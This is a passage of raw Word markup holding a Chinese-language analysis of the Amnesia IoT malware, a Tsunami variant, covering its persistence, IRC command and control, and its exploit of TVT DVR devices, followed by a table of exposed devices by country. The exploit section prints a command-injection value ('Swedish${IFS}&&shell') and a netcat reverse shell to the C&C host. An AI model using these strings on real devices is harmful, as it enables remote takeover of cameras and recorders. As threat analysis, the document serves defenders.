    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>会根据当前用户的权限将自身拷贝到</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>/etc/init.d/.reboottime</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>/etc/cron.daily/.reboottime,</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>然后修改用户目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>.bashrc</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>.bash_profile</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>文件，实现自身随系统启动运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00303982" w:rsidRDefault="00801E05" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-53340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>68580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4937760" cy="3599180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21493"/>
                <wp:lineTo x="21500" y="21493"/>
                <wp:lineTo x="2150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b="6918"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="3599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572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>会杀死与</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>相关的进程，来防止管理员或其他攻击者通过远程登录来控制设备。</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将自身写入到用户目录下</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.bashrc</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.bash_profile</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实现随系统启用运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B67B9" w:rsidRPr="007A375D" w:rsidRDefault="008B67B9" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="000025BD">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="控制指令"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>控制指令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IRC</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议与</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行通信，其中支持的控制指令较多，而且包括许多与</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击相关的指令。通过对控制命令的进一步</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分析，发现</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用了与</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tsunami</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>恶意代码相同的控制指令，也进一步印证了</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tsunami</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的新变种。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="000025BD">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="漏洞利用"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="007A375D">
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:t>在控制指令中包括两个特殊的指令</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>CCTVSSCANNER</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>CCTVPROCS</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>。其中，</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>CCTVSSCANNER</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>用来扫描</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>DVR</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>设备，</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>CCTVPROCS</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>用来对存在漏洞的设备进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:lastRenderedPageBreak/>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>收到</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>CCTVSSCANNER</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>指令时，</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>会构造请求向指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>地址发起连接，然后读取返回内容，如果返回内容中包括</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t xml:space="preserve"> “Cross Web Server”</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>，则表示该</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>DVR</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>设备存在。</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>会构造请求并在请求中加入要远程执行的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令发起对</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DVR</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设备的访问。</w:t>
      </w:r>
      <w:r w:rsidR="00344924">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>${IFS}</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用来代替空格，构造的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nc HOST 8888 -e /bin/bash,</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其中的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> HOST</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>会填充为</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r w:rsidR="00344924">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504125" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>恶意代码会请求</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/language/[language]/string.js</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,TVT DVR</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设备在处理针对</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/language/[language]/</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>路径的请求时，首先会检查</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[language]</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是否存在，如果不存在则执行</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tar -zxf /mnt/mtd/WebSites/language.tar.gz [language]/* -C /nfsdir/language</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令。在</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>构造的请求中</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[language]</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被填充为</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Swedish${IFS}&amp;&amp;shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，由于</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Swedish</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不存在，所以会执行</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tar -zxf /mnt/mtd/WebSites/language.tar.gz Swedish &amp;&amp; shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> /* -C /nfsdir/language</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>令。即</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Swedish</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后面连接的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令会被执行，这就导致了远程命令执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="000025BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三、影响</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>跨网络服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的指纹</w:t>
      </w:r>
      <w:r w:rsidR="008B67B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现，全球范围内有超过</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>22.7</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>万台曝露在互联网上的设备，可能为</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TVT Digital</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>公司生产。使用</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Shodan.io</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Censys.io</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上的关键字进行了搜索，它们分别报告了大约</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>50,000</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和约</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>705,000</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个相关</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00743949">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:t>下表列出了前</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>位潜在易受</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t xml:space="preserve"> TVT Digital DVR</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:t>设备漏洞影响的国家：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="10"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1242"/>
        <w:gridCol w:w="2552"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00D90015" w:rsidTr="0048029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902331" w:rsidRDefault="00FF572C" w:rsidP="00480294">
            <w:pPr>
              <w:pStyle w:val="a9"/>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:t>序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00902331" w:rsidRDefault="00FF572C" w:rsidP="00480294">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:t>地区</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902331" w:rsidRDefault="00FF572C" w:rsidP="00480294">
            <w:pPr>
              <w:pStyle w:val="a9"/>
            </w:pPr>
            <w:r w:rsidRPr="00902331">
              <w:t>感染数量</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1.</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Taiwan</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47170</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2.</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United States</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44179</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3.</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Israel</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23355</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4.</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Turkey</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11780</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5.</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India</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9796</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6.</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Malaysia</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9178</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7.</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Mexico</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7868</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lastRenderedPageBreak/>
              <w:t>8.</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Italy</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7439</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9.</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Vietnam</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6736</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10.</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United Kingdom</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4402</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11.</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Russia</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3571</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12.</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Hungary</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3529</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13.</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France</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3165</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14.</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Bulgaria</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3040</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15.</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Romania</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2783</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16.</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Colombia</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2616</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17.</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Egypt</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2541</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18.</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Canada</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2491</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A375D" w:rsidRPr="00D90015" w:rsidTr="00480294">
        <w:trPr>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19.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005965AD" w:rsidRPr="00D90015" w:rsidRDefault="00FF572C" w:rsidP="00480294">
            <w:pPr>
              <w:pStyle w:val="a9"/>
